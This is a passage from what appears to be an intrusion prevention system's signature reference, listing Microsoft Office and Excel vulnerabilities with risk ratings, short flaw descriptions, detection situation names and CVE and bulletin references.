File-OLE_Microsoft-Office-Excel-Remote-Code-Execution-CVE-2009-3129

References:

CVE-2009-3129
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3129

BID-36945
http://www.securityfocus.com/bid/36945

OSVDB-59860
http://www.osvdb.org/59860

MS09-067
http://technet.microsoft.com/security/bulletin/MS09-067

Microsoft-Office-Excel-Remote-Code-Execution-CVE-2009-3134

About this vulnerability:

Code execution vulnerability in Microsoft Excel

Risk:

High

First detected in:

sgpkg-ips-265-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

Microsoft Excel; Microsoft Excel Viewer

Type:

Malfunction

Description:

Situation:

E-Mail_BS-Microsoft-Office-Excel-Remote-Code-Execution-CVE-2009-3134
HTTP_SS-Microsoft-Office-Excel-Remote-Code-Execution-CVE-2009-3134
File-OLE_Microsoft-Office-Excel-Remote-Code-Execution-CVE-2009-3134

References:

CVE-2009-3134
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3134

MS09-067
http://technet.microsoft.com/security/bulletin/MS09-067

Microsoft-Office-Excel-RTD-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Excel

Risk:

Moderate

First detected in:

sgpkg-ips-388-4219

Last changed:

sgpkg-ips-1618-5242

Platform:

Windows

Software:

Microsoft Excel; Microsoft Office

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in Microsoft Office Excel. The vulnerability is due to a flaw while parsing specially crafted RealTimeData (RTD) records within Excel files. In an attack scenario, where arbitrary code is injected and executed on the target machine, the behaviour of the target is dependent on the intention of the malicious code. If such an attack is not executed successfully, the vulnerable application may terminate.

Situation:

File-OLE_Microsoft-Office-Excel-RTD-Buffer-Overflow

References:

CVE-2010-1246
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1246

BID-40524
http://www.securityfocus.com/bid/40524

MS10-038
http://technet.microsoft.com/security/bulletin/MS10-038

Microsoft-Office-Excel-Sheet-Object-Type-Confusion

About this vulnerability:

A vulnerability in Microsoft Office Excel

Risk:

High

First detected in:

sgpkg-ips-1035-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel

Type:

Malfunction

Description:

There exists a code execution vulnerability in Microsoft Excel.

Situation:

File-OLE_Microsoft-Office-Excel-Sheet-Object-Type-Confusion

References:

CVE-2010-0258
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0258

BID-38550
http://www.securityfocus.com/bid/38550

MS10-017
http://technet.microsoft.com/security/bulletin/MS10-017

Microsoft-Office-Excel-String-Variable-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Excel

Risk:

Moderate

First detected in:

sgpkg-ips-401-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel; Microsoft Office; Microsoft Office

Type:

Buffer Overflow

Description:

A code execution vulnerability exists in Microsoft Office Excel. The vulnerability is due to an error parsing the string length in an ExternSheet record. Remote attackers can exploit this vulnerability by enticing target users to open a malicious Excel file, potentially causing arbitrary code to be injected and executed in the security context of the current user. In an attack scenario, where arbitrary code is injected and executed on the target machine, the behaviour of the target is dependent on the intention of the malicious code. If such an attack is not executed successfully, the vulnerable application may terminate abnormally.

Situation:

HTTP_SS-Microsoft-Office-Excel-String-Variable-Code-Execution
File-OLE_Microsoft-Office-Excel-String-Variable-Code-Execution

References:

CVE-2010-1252
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1252

BID-40530
http://www.securityfocus.com/bid/40530

MS10-038
http://technet.microsoft.com/security/bulletin/MS10-038

Microsoft-Office-Excel-Sxdb-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Office Excel

Risk:

High

First detected in:

sgpkg-ips-382-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft Excel; Microsoft Excel Viewer; Microsoft Open XML File Format Converter

Type:

Malfunction

Description:

A memory corruption vulnerability exists in Microsoft Office Excel. The vulnerability is due to the way Microsoft Office Excel handles Excel files containing crafted SXDB records. Remote attackers can exploit this vulnerability by enticing target users to open a malicious Excel file, potentially causing arbitrary code to be injected and executed in the security context of the current logged on user. In an attack scenario, where arbitrary code is injected and executed on the target machine, the behaviour of the target is dependent on the intention of the malicious code. If such an attack is not executed successfully, the vulnerable application may terminate abnormally.

Situation:

HTTP_SS-Microsoft-Office-Excel-Sxdb-Memory-Corruption
File-OLE_Microsoft-Office-Excel-Sxdb-Memory-Corruption

References:

CVE-2009-3127
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3127

BID-36943
http://www.securityfocus.com/bid/36943

MS09-067
http://technet.microsoft.com/security/bulletin/MS09-067

Microsoft-Office-Excel-SxView-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

High

First detected in:

sgpkg-ips-382-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft Office; Microsoft Office Compatibility Pack; Microsoft Excel Viewer

Type:

Malfunction

Description:

Microsoft Office Excel contains a code execution vulnerability while parsing specially crafted Excel documents.

Situation:

HTTP_SS-Microsoft-Office-Excel-SxView-Memory-Corruption
File-OLE_Microsoft-Office-Excel-SxView-Memory-Corruption

References:

CVE-2009-3128
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3128

BID-36944
http://www.securityfocus.com/bid/36944

MS09-067
http://technet.microsoft.com/security/bulletin/MS09-067

Microsoft-Office-Excel-SxView-SXStreamID-Memory-Corruption-CVE-2010-1245

About this vulnerability:

A memory corruption vulnerability in Microsoft Excel

Risk:

High

First detected in:

sgpkg-ips-321-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

Microsoft Office

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Microsoft Excel.

Situation:

HTTP_SS-Microsoft-Office-Excel-SxView-SXStreamID-Memory-Corruption-CVE-2010-1245
File-OLE_Microsoft-Office-Excel-SxView-SXStreamID-CVE-2010-1245

References:

CVE-2010-1245
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1245

BID-40523
http://www.securityfocus.com/bid/40523

OSVDB-65229
http://www.osvdb.org/65229

MS10-038
http://technet.microsoft.com/security/bulletin/MS10-038

Microsoft-Office-Excel-Table-Record-Parsing-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Excel

Risk:

High

First detected in:

sgpkg-ips-382-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft Excel; Microsoft Excel Viewer; Microsoft Open XML File Format Converter; Microsoft Office; Microsoft Office Compatibility Pack

Type:

Malfunction

Description:

A code execution vulnerability exists in Microsoft Office Excel. The vulnerability is due to improper parsing of certain Excel Table records in an Excel document that leads to memory access violation and potentially allows for code execution. A remote attacker can exploit this vulnerability to execute arbitrary code in the context of the logged in user.

Situation:

HTTP_SS-Microsoft-Office-Excel-Table-Record-Parsing-Code-Execution
File-OLE_Microsoft-Office-Excel-Table-Record-Parsing-Code-Execution

References:

CVE-2010-3232
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3232

BID-43646
http://www.securityfocus.com/bid/43646

MS10-080
http://technet.microsoft.com/security/bulletin/MS10-080

Microsoft-Office-Excel-Unexpected-Field-Value-Handling-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Office Excel

Risk:

High

First detected in:

sgpkg-ips-382-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft Excel; Microsoft Excel Viewer; Microsoft Office; Microsoft Open XML File Format Converter; Microsoft Office Compatibility Pack

Type:

Malfunction

Description:

A memory corruption vulnerability exists in Microsoft Office Excel products.

Situation:

HTTP_SS-Microsoft-Office-Excel-Unexpected-Field-Value-Handling-Memory-Corruption
File-OLE_Microsoft-Office-Excel-Unexpected-Field-Value-Memory-Corruption

References:

CVE-2009-0560
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0560

BID-35244
http://www.securityfocus.com/bid/35244

OSVDB-54956
http://www.osvdb.org/54956

MS09-021
http://technet.microsoft.com/security/bulletin/MS09-021

Microsoft-Office-Excel-Webcharts-Out-Of-Bounds-Write

About this vulnerability:

A vulnerability in Microsoft Excel

Risk:

High

First detected in:

sgpkg-ips-1663-5242

Last changed:

sgpkg-ips-1663-5242

Platform:

Generic

Software:

Microsoft Excel

Type:

Malfunction

Description:

An out-of-bounds write vulnerability has been reported in Microsoft Office Excel. The vulnerability is due to improper handling of malformed files. A remote attacker could exploit this vulnerability by enticing a target user in to opening a crafted file. Successful exploitation could, in the worst case, result in arbitrary code execution under the security context of the user running the vulnerable application.

Situation:

File-Text_Microsoft-Office-Excel-Webcharts-Out-Of-Bounds-Write
File-TextId_Microsoft-Office-Excel-Webcharts-Out-Of-Bounds-Write

References:

CVE-2023-33133
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33133

ms23-jun
http://technet.microsoft.com/security/bulletin/ms23-jun

Microsoft-Office-Excel-WOpt-Record-Memory-Corruption-CVE-2010-0824

About this vulnerability:

A memory corruption vulnerability in Microsoft Excel

Risk:

High

First detected in:

sgpkg-ips-320-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

Microsoft Office

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Microsoft Excel.

Situation:

E-Mail_BS-Microsoft-Office-Excel-WOpt-Record-Memory-Corruption-CVE-2010-0824
HTTP_SS-Microsoft-Office-Excel-WOpt-Record-Memory-Corruption-CVE-2010-0824
File-OLE_Microsoft-Office-Excel-WOpt-Record-Memory-Corruption-CVE-2010-0824

References:

CVE-2010-0824
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0824

BID-40522
http://www.securityfocus.com/bid/40522

OSVDB-65231
http://www.osvdb.org/65231

MS10-038
http://technet.microsoft.com/security/bulletin/MS10-038

Microsoft-Office-Excel-WorksheetOptions-Use-After-Free

About this vulnerability:

A vulnerability in Microsoft Excel

Risk:

High

First detected in:

sgpkg-ips-1210-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel; Microsoft Office

Type:

Malfunction

Description:

A code execution vulnerability has been reported in Excel component of Microsoft Office. The vulnerabilities are due to improper handling of objects in memory. A remote attacker could exploit this vulnerability by enticing a user to open a maliciously crafted file. Successful exploitation, in the worst case, could lead to arbitrary code execution in the context of the user.

Situation:

File-Text_Microsoft-Office-Excel-WorksheetOptions-Use-After-Free

References:

CVE-2019-1448
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1448

Microsoft-Office-Excel-Xlsx-File-Parsing-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Office Compatibility Pack

Risk:

Moderate

First detected in:

sgpkg-ips-414-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft Excel

Type:

Malfunction

Description:

A code execution vulnerability exists in Microsoft Office Excel. The vulnerability is due to improper handling of the ZIP header in an XLSX file when decompressing certain XML elements. This vulnerability may be exploited by remote attackers to execute arbitrary code on the target machine by enticing a user into opening a specially crafted Excel XLSX document. In attack scenarios where code execution is successful the behaviour of the target machine would depend entirely on the intention of the injected code, which would run within the security context of the logged on user. In situations where code execution is not successful, the vulnerable application may terminate abnormally, leading to a denial of service condition.

Situation:

File-Zip_Microsoft-Office-Excel-Xlsx-File-Parsing-Code-Execution

References:

CVE-2010-0263
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0263

MS10-017
http://technet.microsoft.com/security/bulletin/MS10-017

Microsoft-Office-File-Modification-Password-Use-After-Free

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

Moderate

First detected in:

sgpkg-ips-699-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office

Type:

Malfunction

Description:

A use-after-free vulnerability exists in Microsoft Office 2007. The vulnerability is due to problematic code that parses Office documents with modification password protection. A remote attacker could exploit this vulnerability by enticing a user to open a crafted Office document. Successful exploitation could result in arbitrary code execution with the privileges of the currently logged on user.

Situation:

File-OLE_Microsoft-Office-File-Modification-Password-Usage

References:

CVE-2015-1683
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1683

MS15-046
http://technet.microsoft.com/security/bulletin/MS15-046

Microsoft-Office-FlashPix-Converter-Buffer-Overflow-CVE-2010-3951

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

High

First detected in:

sgpkg-ips-363-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office XP

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Office.

Situation:

HTTP_SS-Microsoft-Office-FlashPix-Converter-Buffer-Overflow-CVE-2010-3951
File-OLE_Microsoft-Office-FlashPix-Converter-Buffer-Overflow-CVE-2010-3951

References:

CVE-2010-3951
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3951

MS10-105
http://technet.microsoft.com/security/bulletin/MS10-105

Microsoft-Office-Gdiplus-EMF-File-Handling-Infinite-Loop

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

Moderate

First detected in:

sgpkg-ips-454-4333

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office

Type:

Infinite Loop

Description:

There is a memory corruption vulnerability Microsoft Windows Graphics Device Interface (GDI+). The vulnerability is due to improper sanitization while handling EMF data embedded in Office files. A remote, unauthenticated attacker could exploit this vulnerability by enticing a user to open or view a specially crafted Microsoft Office file. Successful exploitation could result in arbitrary code execution in the context of the currently logged-in user.

Situation:

File-OLE_Microsoft-Office-Gdiplus-EMF-File-Handling-Infinite-Loop

References:

CVE-2012-0167
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0167

BID-53351
http://www.securityfocus.com/bid/53351

OSVDB-81719
http://www.osvdb.org/81719

MS12-034
http://technet.microsoft.com/security/bulletin/MS12-034

Microsoft-Office-Groove-Insecure-Library-Loading

About this vulnerability:

A vulnerability in Microsoft Office Groove

Risk:

High

First detected in:

sgpkg-ips-382-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Groove 2007

Type:

Malfunction

Description:

A code execution vulnerability exists in Microsoft Office Groove. The vulnerability is due to a design weakness while loading libraries, such as mso.dll and GroovePerfmon.dll. Remote attackers could exploit this vulnerability by enticing target users to open a VCG or GTA file from a remote WebDAV or an SMB share. Successful exploitation of this vulnerability would result in loading the attacker-controlled library and execution of arbitrary code with the privileges of the affected application.

Situation:

HTTP_CSU-Microsoft-Office-Groove-Insecure-Library-Loading
SMB-TCP_Microsoft-Office-Groove-Insecure-Library-Loading

References:

CVE-2010-3146
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3146

BID-42695
http://www.securityfocus.com/bid/42695

MS11-016
http://technet.microsoft.com/security/bulletin/MS11-016

Microsoft-Office-Image-Filter-Crafted-BMP-Header-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

Moderate

First detected in:

sgpkg-ips-409-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office; Microsoft Works

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in Image Filter shipped with Microsoft Office. The vulnerability is due to improper validation of the number of used colors in BMP header. A remote unauthenticated attacker can exploit this vulnerability by enticing a user to open a malicious BMP image with the affected application, causing the execution of arbitrary code in the security context of the current user. An attack targeting this vulnerability can result in the injection and execution of code. If code execution is successful, the behaviour of the target will depend on the intention of the attacker. Any code injected will be executed within the security context of the currently logged in user. In the case of an unsuccessful code execution attack, the affected application will terminate resulting in the loss of any unsaved data from the current session.

Situation:

File-Binary_Microsoft-Office-Image-Filter-Crafted-BMP-Header-Buffer-Overflow

References:

CVE-2008-3020
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3020

BID-30599
http://www.securityfocus.com/bid/30599

MS08-044
http://technet.microsoft.com/security/bulletin/MS08-044

Microsoft-Office-Information-Disclosure-Vulnerability-CVE-2016-3234

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

Moderate

First detected in:

sgpkg-ips-770-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office 2007; Microsoft Office 2010; Microsoft Office SharePoint Server 2010; Microsoft Sharepoint Server 2013; Microsoft Office Web Apps 2010; Microsoft Office Web Apps 2013

Type:

Malfunction

Description:

There exists an information disclosure vulnerability in Microsoft Office.

Situation:

File-RTF_Microsoft-Office-Information-Disclosure-Vulnerability-CVE-2016-3234

References:

CVE-2016-3234
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3234

MS16-070
http://technet.microsoft.com/security/bulletin/MS16-070

Microsoft-Office-Insecure-Library-Loading

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

High

First detected in:

sgpkg-ips-421-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office

Type:

Malfunction

Description:

An insecure library loading vulnerability has been reported in Microsoft Office.

Situation:

HTTP_CSU-Insecure-Microsoft-Library-Loading
SMB-TCP_CHS-Microsoft-Office-Insecure-Library-Loading

References:

CVE-2011-1980
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1980

MS11-073
http://technet.microsoft.com/security/bulletin/MS11-073

Microsoft-Office-Insecure-Library-Loading-CVE-2010-3337

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

High

First detected in:

sgpkg-ips-353-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office 2007; Microsoft Office 2010

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Office.

Situation:

HTTP_CS-Microsoft-Windows-DLL-Hijack-Vulnerability

References:

CVE-2010-3337
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3337

MS10-087
http://technet.microsoft.com/security/bulletin/MS10-087

Microsoft-Office-Jet-Engine-MDB-File-Parsing-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Jet Engine (msjet40.dll)

Risk:

Moderate

First detected in:

sgpkg-ips-385-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Jet Engine; Microsoft Office

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in Microsoft Jet Engine. The flaw is due to boundary errors when processing MDB database files. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted MDB file. Successful exploitation may lead to arbitrary code execution in the security context of the logged in user.

Situation:

HTTP_SS-Microsoft-Office-Jet-Engine-MDB-File-Parsing-Buffer-Overflow
File-Binary_Microsoft-Office-Jet-Engine-MDB-File-Parsing-Buffer-Overflow

References:

CVE-2007-6026
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6026

BID-26468
http://www.securityfocus.com/bid/26468

MS08-028
http://technet.microsoft.com/security/bulletin/MS08-028

Microsoft-Office-Malformed-Routing-Slip-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Word

Risk:

Moderate

First detected in:

sgpkg-ips-414-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft Word; Microsoft Excel; Microsoft Outlook; Microsoft PowerPoint; Microsoft Office

Type:

Malfunction

Description:

A vulnerability exists in Microsoft Office components when processing documents which include malformed Routing Slip records. This vulnerability may be exploited by supplying a malicious document to a vulnerable target host and enticing a user to open the file. An attacker may exploit this vulnerability to inject and execute arbitrary code into the vulnerable application process. In an attack case where code injection is not successful, all instances of the vulnerable Microsoft Office application will terminate. This can potentially lead to a loss of data. In a more sophisticated attack where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the current user.

Situation:

File-OLE_Microsoft-Office-Malformed-Routing-Slip-Code-Execution

References:

CVE-2006-0009
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0009

BID-17000
http://www.securityfocus.com/bid/17000

OSVDB-23903
http://www.osvdb.org/23903

MS06-012
http://technet.microsoft.com/security/bulletin/MS06-012

Microsoft-Office-Malicious-OLE-File

About this vulnerability:	A vulnerability in Microsoft Office
Risk:	Moderate
First detected in:	sgpkg-ips-467-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Microsoft Office
Type:	Malfunction
Description:	A malicious OLE file was detected
Situation:	File-OLE_Microsoft-Office-Malicious-OLE-File

Microsoft-Office-Memory-Corruption-CVE-2015-0086

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

High

First detected in:

sgpkg-ips-633-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft Office

Type:

Malfunction

Description:

A vulnerability in Microsoft Office

Situation:

File-RTF_Microsoft-Office-Memory-Corruption-CVE-2015-0086

References:

CVE-2015-0086
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0086

MS15-022
http://technet.microsoft.com/security/bulletin/MS15-022

Microsoft-Office-Memory-Corruption-CVE-2016-0022

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

High

First detected in:

sgpkg-ips-730-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft Office

Type:

Input Validation

Description:

A vulnerability in Microsoft Office

Situation:

File-RTF_Microsoft-Office-Memory-Corruption-CVE-2016-0022

References:

CVE-2016-0022
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0022

MS16-015
http://technet.microsoft.com/security/bulletin/MS16-015

Microsoft-Office-Memory-Corruption-CVE-2016-0052

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

High

First detected in:

sgpkg-ips-730-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft Office

Type:

Input Validation

Description:

A vulnerability in Microsoft Office

Situation:

File-RTF_Microsoft-Office-Memory-Corruption-CVE-2016-0052

References:

CVE-2016-0052
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0052

MS16-015
http://technet.microsoft.com/security/bulletin/MS16-015

Microsoft-Office-Memory-Corruption-CVE-2016-0053

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

High

First detected in:

sgpkg-ips-730-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft Office

Type:

Input Validation

Description:

A vulnerability in Microsoft Office

Situation:

File-RTF_Microsoft-Office-Memory-Corruption-CVE-2016-0053

References:

CVE-2016-0053
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0053

MS16-015
http://technet.microsoft.com/security/bulletin/MS16-015

Microsoft-Office-Memory-Corruption-CVE-2016-3280

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

Moderate

First detected in:

sgpkg-ips-777-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft Office

Type:

Buffer Overflow

Description:

A vulnerability in Microsoft Office

Situation:

File-RTF_Microsoft-Office-Memory-Corruption-CVE-2016-3280

References:

CVE-2016-3280
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3280

MS16-088
http://technet.microsoft.com/security/bulletin/MS16-088

Microsoft-Office-Memory-Corruption-Vulnerability-CVE-2015-2558

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

High

First detected in:

sgpkg-ips-695-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office 2007; Microsoft Office 2010; Microsoft Office 2013; Microsoft Office 2016

Type:

Malfunction

Description:

There is a remote code execution in multiple version of Microsoft Office.

Situation:

File-TextId_Microsoft-Office-Memory-Corruption-Vulnerability-CVE-2015-2558

References:

CVE-2015-2558
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2558

MS15-110
http://technet.microsoft.com/security/bulletin/MS15-110

Microsoft-Office-MSO-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-281-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office XP; Microsoft Office 2004

Type:

Input Validation

Description:

There is a buffer overflow vulnerability in Microsoft Office.

Situation:

HTTP_SS-Microsoft-Office-MSO-Buffer-Overflow
File-OLE_Microsoft-Office-MSO-Buffer-Overflow

References:

CVE-2010-0243
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0243

MS10-003
http://technet.microsoft.com/security/bulletin/MS10-003

Microsoft-Office-MSO-Large-SPID-Read-AV-CVE-2010-3336

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

High

First detected in:

sgpkg-ips-353-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office XP; Microsoft Office 2004; Microsoft Office 2008

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Office.

Situation:

HTTP_SS-Microsoft-Office-MSO-Large-SPID-Read-AV-CVE-2010-3336
File-OLE_Microsoft-Office-MSO-Large-SPID-Read-AV-CVE-2010-3336

References:

CVE-2010-3336
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3336

BID-44660
http://www.securityfocus.com/bid/44660

MS10-087
http://technet.microsoft.com/security/bulletin/MS10-087

Microsoft-Office-Oleobject-Type-Confusion

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

Moderate

First detected in:

sgpkg-ips-1011-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office

Type:

Malfunction

Description:

Improper parsing of XML Office files causes a tpye confusion vulnerability in Microsoft Office. A successful exploit allows an attacker to run arbitrary code on the target system.

Situation:

File-TextId_Microsoft-Office-Oleobject-Type-Confusion

References:

CVE-2017-11826
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11826

Microsoft-Office-OneNote-Url-Validation-Error-Vulnerability

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

High

First detected in:

sgpkg-ips-167-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office OneNote; Microsoft Office XP; Microsoft Office 2003

Type:

Input Validation

Description:

There is a remote code execution vulnerability in Microsoft Office OneNote. The vulnerability lies in the way OneNote handles specially-crafted URLs using the OneNote protocol handler. As a result of this vulnerability, a remote attacker can download arbitrary files on a victim's system without requiring permission. Successful exploitation of this vulnerability may lead to arbitrary code execution on the target host with the privileges of the current user.

Situation:

HTTP_SS-Microsoft-Office-OneNote-Url-Validation-Error
File-Text_Microsoft-Office-OneNote-Url-Validation-Error

References:

CVE-2008-3007
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3007

BID-31067
http://www.securityfocus.com/bid/31067

MS08-055
http://technet.microsoft.com/security/bulletin/MS08-055

Microsoft-Office-Outlook-CVE-2018-8161-Use-After-Free

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

Moderate

First detected in:

sgpkg-ips-1082-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office

Type:

Malfunction

Description:

Incorrect parsing of HTML vauses a use after free vulnerability in Microsoft Office. A successful exploitation could result in a remote attacker being able to execute arbitrary code with the privileges of the application.

Situation:

File-Text_Microsoft-Office-Outlook-CVE-2018-8161-Use-After-Free

References:

CVE-2018-8161
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8161

Microsoft-Office-Outlook-Mailto-URI-Handling-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Office Outlook

Risk:

Moderate

First detected in:

sgpkg-ips-385-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Outlook; Microsoft Office

Type:

Input Validation

Description:

A vulnerability exists in the way Microsoft Office Outlook handles mailto URIs. Specifically, the vulnerability is a result of lack of proper URI filtering. When exploited successfully, the vulnerability can lead to arbitrary command execution in the security context of the currently logged in user.

Situation:

HTTP_SS-Microsoft-Office-Outlook-Mailto-URI-Handling-Code-Execution
File-Text_Microsoft-Office-Outlook-Mailto-URI-Handling-Code-Execution

References:

CVE-2008-0110
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0110

BID-28147
http://www.securityfocus.com/bid/28147

MS08-015
http://technet.microsoft.com/security/bulletin/MS08-015

Microsoft-Office-Pict-Filter-Invalid-Length-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

Moderate

First detected in:

sgpkg-ips-415-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office; Microsoft Project; Microsoft Works

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in Microsoft Office PICT Filter. The vulnerability is due to an error in handling a PICT image file. Remote unauthenticated attackers could exploit this vulnerability by persuading a target user to open a specially crafted PICT file. Successful exploitation would cause a memory corruption that may lead to arbitrary code execution in the security context of the logged in user. An attack targeting this vulnerability can result in the injection and execution of code. If code execution is successful, the behaviour of the target will depend on the intention of the attacker. Any code injected will be executed within the security context of the currently logged in user. In the case of an unsuccessful code execution attack, the affected application will terminate resulting in the loss of any unsaved data from the current session.

Situation:

File-Binary_Microsoft-Office-Pict-Filter-Invalid-Length-Memory-Corruption

References:

CVE-2008-3018
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3018

BID-30597
http://www.securityfocus.com/bid/30597

MS08-044
http://technet.microsoft.com/security/bulletin/MS08-044

Microsoft-Office-Pict-Filter-Map-Structure-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

Moderate

First detected in:

sgpkg-ips-415-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office; Microsoft Project; Microsoft Works

Type:

Buffer Overflow

Description:

Situation:

File-Binary_Microsoft-Office-Pict-Filter-Map-Structure-Memory-Corruption

References:

CVE-2008-3021
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3021

BID-30598
http://www.securityfocus.com/bid/30598

MS08-044
